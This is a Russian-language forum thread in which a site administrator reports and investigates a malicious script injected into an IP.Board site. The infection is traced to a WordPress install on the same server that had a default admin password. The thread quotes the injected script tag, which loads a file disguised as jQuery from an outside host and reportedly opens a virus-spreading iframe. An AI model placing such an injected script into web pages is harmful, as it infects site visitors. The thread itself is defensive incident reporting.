Jump to content

Featured Replies

Posted
comment_40996

Здравствуйте, сегодня обнаружил у меня в ipb подключение js скрипта с сайта stummann.net.

Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php?

Выглядит это както так <script language="JavaScript" src="__stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script>

 

Само содержание скрипта дает понять что он банально открывает маленький iframe, через который чаще всего распространяются вирусы.

 

Проверяйте свои сообщества! А то побанят всех))

comment_41003


Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php?

 

На этот вопрос только расследование взлома может дать ответ. Надо изучать логи, бэкапы и т.д, и т.п.

  • Author
comment_41007

Уже все расследовал. Теория такая :)
На 1 и том же сервере стоит еще несколько wordpress, на 1 из них стоял стандартный пароль admin admin

Только что прогнал все файлы через антивирус, и именно на том сайте нашел php.shell и php.exploit.

 

Так что это похоже на последствие массовой атаки на wordpress

  • Author
comment_41012

В шапке всех других сайтов тоже появился этот скрипт

 

Он вставляется во всех php файлах где есть </head>

Edited by andreuka

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.


Guest
Ответить в этой теме...

Последние посетители 0

  • No registered users viewing this page.